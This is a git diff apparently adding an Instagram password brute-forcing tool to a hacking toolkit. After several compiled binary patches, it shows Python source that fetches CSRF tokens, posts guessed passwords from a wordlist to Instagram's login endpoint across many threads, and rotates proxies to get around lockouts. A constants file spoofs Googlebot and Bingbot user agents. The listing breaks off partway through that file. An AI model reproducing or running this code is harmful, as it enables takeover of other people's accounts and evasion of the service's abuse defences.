zdCa?ge^7}kgCGjH@Aa#LT2y1+?=KC)C}h6UuMZkgW6+G6Qv68hKvzEzx|+7mooHFt z?u+))=lHT{tHRB@gS7CnewvQkvZ&lKqeoe4h~4gH<9_lOll;9ylP0?GKDamP9APZn zHKWtVKTU?o0ncsjCRz4qWb|C5iq;@GjcM~ZAH|Q7ZeFaAWPg-r@i;Z{n0DyUDdvv? z^Df?O4R`_?!NuHVxS%4mDJ-qMX&GtbK#8kv0m*>9JP)7*OAAbtwIS3h?lX=;H}xI24yjl{Rwts>aB`p!%Rg2L@XzeO-E zwOIt+EKd5}k5lFzj!uTUXk1od5uCtY!vt2W_meD-7mHg-C&$u-ATt4dqt2R-2iACo zZeLWiwY8~IuQlIdKB?^%ZkF~RnpK{hvo~be3Fqv0`J4ISAB1@s!~c0_Ymn-0vSmi2 zd~5r?J3oBm)|_*x1xvek_E);1Mge9y*OJ1QJ8rD#8xzU#(%Nig8N@>W3^6@t0aj<~m5i8`MU`{`y%b3qj|BhB}i;w}zMqK?#D`+I z!Q*Q@UY`Lkz2@Z^Q!#5zCCQG__Lfa6Ujfp<-4OZek!K*Ct&stbTMxvsqP<}nwX@g0 zX2^$3od|h()JQrVKq!yXQ|LQ0U!eHH+Rv>C*NXIi5UeoF@rl?uyN3HS>}?g=UM49L(lQzTXT>a3uinU7hZR$(^GQ| z0={uuSrpLCuH4?xMepIwNNqyafPgjJapC)ywY~6timbGPue5>Cpv9Tg@=QIIr!Bh1 zQ)$)@#F=yYSGr<)Nm=3dY`@@)@&FZbbnyR;W({QUUllvY%Z zD#miy2THq{2ar}VCeNKSZ|clyQz(a&=wc7;yakP8Kb8F+^MDZT(x~=;E@X`-ud=!u z&sOy+;Caq7zJ4@H0v@j;rm*DTH`5Sp(L zv1q`MMT1!(;Sv!xGr`Vg5HTLot|ra0(`;h$yv$l_c|udBwcbbGhem z&ntUWfk?zvHFcOOrY=<@ZTc)7`cs1VBRG14I*S$^Bp2=>s!Q;>CCr5+Mcz>mFYZ_>VoG|+L{f6)}nD) zP5csb%6uO}l{U3;&WD=$rzT%4mHVRg3ssZPQWRrV)90aRF_Wwy(NmV2$0LU?h3Y0B zjrmspCkwCAg!uA_pVEoRnJE-a))!~{pNWg3kq1yT;-mcqj6IqzL+DJ=A+VOpkOjd0ZH^gYR-LL|&Cbi0XzW~GI2=c? z648oB;}9bbvNyh9?(K@>dk^R|UaxM}xou?Y^VQk9Mr@0n7Op;8p>U+n^i?EK|O`POe3nQmxBLxG*6?%))4w z{D}_Ag$oslqUgP{6(+@$lbPYulZH1F>euJFnk$YL z#fYXaKBqlKEY+VT1fg`DQ4|kU&n?Vq~9;^gzaD&Hp+AFr6Arn$%w7)s8VhA4v zOXhzuxD=~eXF=GpL55HfEz`ow|4!)s(HhIk|3vfB$Np78y}iHL8R5?a*HWBi3V*cU eOFKCq?L~Jgf_JR8Zqr$~nr^{2Lexi0o&N$JN|F}< literal 0 HcmV?d00001 diff --git a/htk-lite/files/Instagram/lib/__pycache__/const.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/const.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..2228a0073f36d03c8249bd8bec370d04db2d8e37 GIT binary patch literal 3952 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 Gukml%`L?+L literal 0 HcmV?d00001 diff --git a/htk-lite/files/Instagram/lib/__pycache__/password_manager.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/password_manager.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..d90e8934a6e780fe34c57dd53fab734607979c0c GIT binary patch literal 2945 zcmZ`*J!~9B6rP#=y+7M=>^Oi4CQxvQ*eD_-NGORM6GVY!l1M?PM9cbSY_GldY8~ym|jK^R-%;;rrp2KOcKl z#{QkccB$GU4E#BaqaFL3Z({L>Aq;AV=couh4zZEnBi+gFZO;E%Ie&BS*lbQh@Y*+SFe2vtolUhEa|kPq`lI?I#@`uZW`|p zdS7KkYSQlE=K#5lk*xzL*5Hyggyd2@V+}{S(vj{nw$B@$^rVmfpp6VM2eKr~m_u2S zRm>&u*5rugEvxc+MUD4U03D0FJr}rVseX^Bfph@F9`TfVgqM4)UpZiTHL6L5!`;QZ z4>X7P`iKd;P$NyU+yq(SALDD4ZMBpMlPrqUS0?p#aBB%afqPCmDAXa0*TS3kMBFt?U(TuGB$&8;M< z%I3amXL-D;1O97^^G$jg2lqI`r8q17iF|qr`>4Ois znwEo@Fes^Q_Phy%a$=or1o{Haecs~-wh#xJSS5@fce|=B>%uBiBn5@>v|6D(FqU!# zk~1oE#>@P5hYZ_ILmlXHBw<O`_uzT!VqNDcn3gnje zsWVhb))cwUTeS7RJ8=(HjY^)OV3P}GW@l%O(98M~45-&MrIM{aW_=<65oX5s%u5Gn9 zPDMta2hWEXgOYTG;L}c3jEFK1`53<}d|nl=N9b5zIgAkH>tTfc#o{PJQc$b^-g*AV zp4k4qC*b?v_Ru@mMfSlGC7`310g;9W>=F6Z#|Uf^16vQL*ap*&;9rkowK?7PC2=@C zr(dEg<3M084dyb=m!Q z;-yu13g2J19@IxQg`$XTg)r)EMUA<1LFjjAO|_$`_n1H{+`dg!wC%U)e`-+rG6B3A za2FNr?`Yo{)v2$6^A<+-5dh;ZA4l|kE)e^1F@`*Fg)gdn45KP0Fnm<*4B+m>>B=Q7 z4-n|B>bPByyU)s*65$blRZ( z^7iQ>Aos|l15X%mD3<(*tY8PQ$;R0VCf}WH2Gw$`^R+{{e0TD+yDZ1q$B`BG2~r#; z7VqL1N{atE&CT*ocjMS$uf>KK7U@kAMf948B2$i{R!457gjb_zb1O~@ilz%1_moDb z(fN+eHf{6kJrHcuuvue6h4-Pt-JtaiqJ2hyo({(V-MKmdARlHE0HFv+s&43pemEJv zTXjd=(6Jng^{R36q@`>on_w-@*6^mVozghjPNu2N7+fgJvxC=?eb_YYKZ7@x?TE(j gEU&9(Zp9u`#_DEY0paI`^*8D2%*f$L@Z#tE2h=@`VE_OC literal 0 HcmV?d00001 diff --git a/htk-lite/files/Instagram/lib/__pycache__/proxy.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/proxy.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..b9ff6ce9b30cd18cc03dfcb4d0ebc568e036876a GIT binary patch literal 987 zcma)4!EVz)5S?AyiIXO9pc3TD&4<=f#R(9q+91TmLgE$)tz7ShIykXeZzPf?r{)8= zmjfL69Ikui3lKL>%&glI5UM)X%+7je=DnSrqkg{&C?7Arz4^fazSHJPd~^;`>s>T2 zK!Ri&R0ZeWh)Mn$A}_;}Yw^%KM6HKt6krUDxWvc}j6CH_Px>1;XQKf9K(?IULcc9T z=eN=C$gcB4xr6n4Hh87W4~vXrMG{&`k5Ox4zG5p7NDYHo5-}T86d!Tx*Qyw6iv0?j zZu09%JXJDJV_lXe9v&Y(-#d78FpN*lyS*YeDjw&Bs^gcl+N5uFI*p6`BzD#ItA!1P z$Y;3`A|zx-hb`|oa{E_D88*-ft$(wG2{vv(EO}yiUPa7N!-bmW_%$Y=Z5z!FYJxc&bM*zjpX=owY{ Hi3+~~HDkEQ literal 0 HcmV?d00001 diff --git a/htk-lite/files/Instagram/lib/__pycache__/proxy_list.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/proxy_list.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..5e5bf03b8bad761fd19f4da7692c0ce818253052 GIT binary patch literal 785 zcmZuv&1)1f6o1KlG_6}`MFhcPFLUS)lpaNvc2xvfgbKn!3DZehvz?upCR1q3da{3j zcQ5tmpW`)G{{(NId@sXpix_xcc^|*u3pv=_+yFdZzx_PEV*tM>Se_W25sG_)>J2DR z>=s4CmuSiqKY}bOF|#@xy%CDrL8Sp}V9FI%-oi9ek&4mADp4ugM6F@J@aykwb9MdB zxUNL_aLCfALlj5s&R_u&;jw{DGUnq7%gH)jo&EqzJpYXHxmKpgZPRr5`0(J>?%w|1 zIRDh0?^dSM`KhV2%iq?nE6!{&&nt71w}dTe+OWO$LP}GcPD(+*!~odM;}yT*GF^rg zW+N2B4n+6Sxf(8D24gth`OFu5#uiMmXK>D~z=&hS`$$Dca3MZ|igBf6;<;&k+%~rR z@H&eujkjy0hzMQ~j!yzvpUPmv&b>+~JCL$$>aH-glkySXIO+v9V9%LgH%}jKabLLF zgdhneY_f$8?Qw_vzcaRacpjMfv}jvhtBeO;b{(t#VPgk)w~exV#I1YyzIl?R^xSnZ z*HZcoDd&y4tjNbjE-s6z&)AfP(>h_~0~mUCOPgEzEmY=62`(a$hPz3|ecGJNblHXY Qf6ZRJ=z(8S^KTUR3v~^m*8l(j literal 0 HcmV?d00001 diff --git a/htk-lite/files/Instagram/lib/__pycache__/proxy_manager.cpython-37.pyc b/htk-lite/files/Instagram/lib/__pycache__/proxy_manager.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..1d279ac7620ec9b631784e89bb0a9b4c5b4f3eef GIT binary patch literal 1490 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 max_bad_proxies: + self.proxies.pop(0) + + self.proxies.append(proxy) + diff --git a/htk-lite/files/Instagram/lib/browser.py b/htk-lite/files/Instagram/lib/browser.py new file mode 100644 index 0000000..d3aefea --- /dev/null +++ b/htk-lite/files/Instagram/lib/browser.py @@ -0,0 +1,127 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Browser + +from time import time +from random import choice +from requests import Session +from .const import browser_data, response_codes, fetch_time, user_agents, debug + + +class Browser(object): + + account_exists = None + + def __init__(self, username, password, proxy): + self.proxy = proxy + self.is_found = False + self.is_active = True + self.is_locked = False + self.start_time = None + self.browser = self.br() + self.username = username + self.password = password + self.is_attempted = False + + def br(self): + header = browser_data['header'] + header['user-agent'] = choice(user_agents) + + session = Session() + session.headers.update(header) + session.proxies.update(self.proxy.addr) + return session + + def get_token(self): + token = None + try: + token = self.browser.get( + browser_data['home_url'], timeout=fetch_time).cookies.get_dict()['csrftoken'] + + self.browser.headers.update({ + 'cookie': 'mid=XLzTtAALAAEb-Sz-JUGbyLphzGmc; csrftoken={}; rur={}'.format( + token, self.browser.cookies.get_dict()['rur'] + ) + }) + except: + pass + finally: + return token + + def post_data(self): + response = None + data = {browser_data['username_field']: self.username, + browser_data['password_field']: self.password} + + try: + response = self.browser.post( + browser_data['login_url'], data=data, timeout=fetch_time).json() + except: + pass + finally: + return response + + def check_exists(self, response): + if 'user' in response: + Browser.account_exists = response['user'] + + def check_response(self, response): + if 'authenticated' in response: + if response['authenticated']: + return response_codes['succeed'] + + if 'message' in response: + if response['message'] == 'checkpoint_required': + return response_codes['succeed'] + + if response['status'] == 'fail': + return response_codes['locked'] + + if 'errors' in response: + return response_codes['locked'] + + return response_codes['failed'] + + def authenicate(self): + response = self.post_data() + resp = {'attempted': False, 'accessed': False, 'locked': False} + + if debug: + print('pass: {} => {}'.format(self.password, response)) + + if response: + resp['attempted'] = True + resp_code = self.check_response(response) + + if resp_code == response_codes['locked']: + resp['locked'] = True + + if resp_code == response_codes['succeed']: + resp['accessed'] = True + + if Browser.account_exists == None: + self.check_exists(response) + + return resp + + def attempt(self): + self.start_time = time() + token = self.get_token() + + if token: + self.browser.headers.update({'x-csrftoken': token}) + resp = self.authenicate() + + if resp['attempted']: + self.is_attempted = True + + if not resp['locked']: + if resp['accessed']: + self.is_found = True + else: + self.is_locked = True + self.close() + + def close(self): + self.browser.close() + self.is_active = False diff --git a/htk-lite/files/Instagram/lib/bruter.py b/htk-lite/files/Instagram/lib/bruter.py new file mode 100644 index 0000000..f21269b --- /dev/null +++ b/htk-lite/files/Instagram/lib/bruter.py @@ -0,0 +1,176 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Bruter + +from time import time, sleep +from lib.browser import Browser +from lib.display import Display +from threading import Thread, RLock +from lib.proxy_manager import ProxyManager +from lib.password_manager import PasswordManager +from lib.const import max_time_to_wait, max_bots_per_proxy + + +class Bruter(object): + + def __init__(self, username, threads, passlist_path): + self.browsers = [] + self.lock = RLock() + self.password = None + self.is_alive = True + self.is_found = False + self.bots_per_proxy = 0 + self.username = username + self.last_password = None + self.active_passwords = [] + self.proxy_manager = ProxyManager() + self.display = Display(username, passlist_path) + self.password_manager = PasswordManager(username, + passlist_path, threads, self.display) + + def manage_session(self): + if self.password_manager.is_read: + if not self.password_manager.list_size or self.is_found: + self.password_manager.session.delete() + else: + if self.is_found: + self.password_manager.session.delete() + else: + self.password_manager.session.write(self.password_manager.attempts, + self.password_manager.passlist) + + def browser_manager(self): + while self.is_alive: + + for browser in self.browsers: + + if not self.is_alive: + break + + if Display.account_exists == None and Browser.account_exists != None: + Display.account_exists = Browser.account_exists + + if not browser.is_active: + + password = browser.password + + if browser.is_attempted and not browser.is_locked: + + if browser.is_found and not self.is_found: + self.password = password + self.is_found = True + + with self.lock: + self.password_manager.list_remove(password) + else: + with self.lock: + self.proxy_manager.bad_proxy(browser.proxy) + + self.remove_browser(browser) + + else: + if browser.start_time: + if time() - browser.start_time >= max_time_to_wait: + browser.close() + + def remove_browser(self, browser): + if browser in self.browsers: + with self.lock: + self.browsers.pop(self.browsers.index(browser)) + self.active_passwords.pop( + self.active_passwords.index(browser.password) + ) + + def attack(self): + proxy = None + is_attack_started = False + while self.is_alive: + + browsers = [] + for password in self.password_manager.passlist: + + if not self.is_alive: + break + + if not proxy: + proxy = self.proxy_manager.get_proxy() + self.bots_per_proxy = 0 + + if self.bots_per_proxy >= max_bots_per_proxy: + proxy = None + + if not proxy: + continue + + if not password in self.active_passwords and password in self.password_manager.passlist: + browser = Browser(self.username, password, proxy) + browsers.append(browser) + self.bots_per_proxy += 1 + + if not is_attack_started: + self.display.info('Starting attack ...') + is_attack_started = True + + with self.lock: + self.browsers.append(browser) + self.active_passwords.append(password) + + for browser in browsers: + thread = Thread(target=browser.attempt) + thread.daemon = True + try: + thread.start() + except: + self.remove_browser(browser) + + def start_daemon_threads(self): + attack = Thread(target=self.attack) + browser_manager = Thread(target=self.browser_manager) + proxy_manager = Thread(target=self.proxy_manager.start) + password_manager = Thread(target=self.password_manager.start) + + attack.daemon = True + proxy_manager.daemon = True + browser_manager.daemon = True + password_manager.daemon = True + + attack.start() + proxy_manager.start() + browser_manager.start() + password_manager.start() + + self.display.info('Searching for proxies ...') + + def stop_daemon_threads(self): + self.proxy_manager.stop() + self.password_manager.stop() + + def start(self): + self.display.info('Initiating daemon threads ...') + self.start_daemon_threads() + + last_attempt = 0 + while self.is_alive and not self.is_found: + + if last_attempt == self.password_manager.attempts and self.password_manager.attempts: + sleep(1.5) + continue + + for browser in self.browsers: + + self.display.stats( + browser.password, self.password_manager.attempts, len(self.browsers)) + last_attempt = self.password_manager.attempts + self.last_password = browser.password + + if not self.is_alive or self.is_found: + break + + if self.password_manager.is_read and not self.password_manager.list_size and not len(self.browsers): + self.is_alive = False + + def stop(self): + self.is_alive = False + self.manage_session() + self.stop_daemon_threads() + self.password_manager.session.is_busy = False diff --git a/htk-lite/files/Instagram/lib/const.py b/htk-lite/files/Instagram/lib/const.py new file mode 100644 index 0000000..a2cfc84 --- /dev/null +++ b/htk-lite/files/Instagram/lib/const.py @@ -0,0 +1,76 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Constants + +import os + +# User agents +user_agents = [ + 'Googlebot/2.1 (+http://www.google.com/bot.html)', + 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36', + 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/27.0.1453 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', + + + 'Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (compatible; adidxbot/2.0; http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (seoanalyzer; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) SitemapProbe', + 'Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 530) like Gecko (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; adidxbot/2.0; http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) 